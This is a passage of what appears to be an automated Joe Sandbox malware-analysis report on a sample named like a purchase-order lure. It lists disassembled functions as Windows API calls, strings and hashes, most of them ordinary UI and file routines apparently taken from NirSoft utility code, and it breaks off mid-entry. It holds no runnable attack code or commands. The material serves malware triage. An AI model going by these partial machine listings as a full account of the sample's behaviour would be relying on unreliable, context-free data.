                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                • String ID:
                                                                                • API String ID: 1700100422-0
                                                                                • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                • String ID:
                                                                                • API String ID: 552707033-0
                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                • String ID: 4$h
                                                                                • API String ID: 4066021378-1856150674
                                                                                • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf
                                                                                • String ID: %%0.%df
                                                                                • API String ID: 3473751417-763548558
                                                                                • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                • String ID: A
                                                                                • API String ID: 2892645895-3554254475
                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                APIs
                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                • String ID: caption
                                                                                • API String ID: 973020956-4135340389
                                                                                • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                APIs
                                                                                Strings
                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                • API String ID: 1283228442-2366825230
                                                                                • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                • memset.MSVCRT ref: 004139B8
                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                • memset.MSVCRT ref: 00413A00
                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                • String ID: \systemroot
                                                                                • API String ID: 4173585201-1821301763
                                                                                • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy
                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                • API String ID: 1284135714-318151290
                                                                                • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                • String ID: 0$6
                                                                                • API String ID: 4066108131-3849865405
                                                                                • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004082EF
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                • memset.MSVCRT ref: 00408362
                                                                                • memset.MSVCRT ref: 00408377
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 290601579-0
                                                                                • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                APIs
                                                                                • memchr.MSVCRT ref: 00444EBF
                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                • memset.MSVCRT ref: 0044505E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memchrmemset
                                                                                • String ID: PD$PD
                                                                                • API String ID: 1581201632-2312785699
                                                                                • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                • String ID:
                                                                                • API String ID: 2163313125-0
                                                                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free$wcslen
                                                                                • String ID:
                                                                                • API String ID: 3592753638-3916222277
                                                                                • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040A47B
                                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                • String ID: %s (%s)$YV@
                                                                                • API String ID: 3979103747-598926743
                                                                                • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
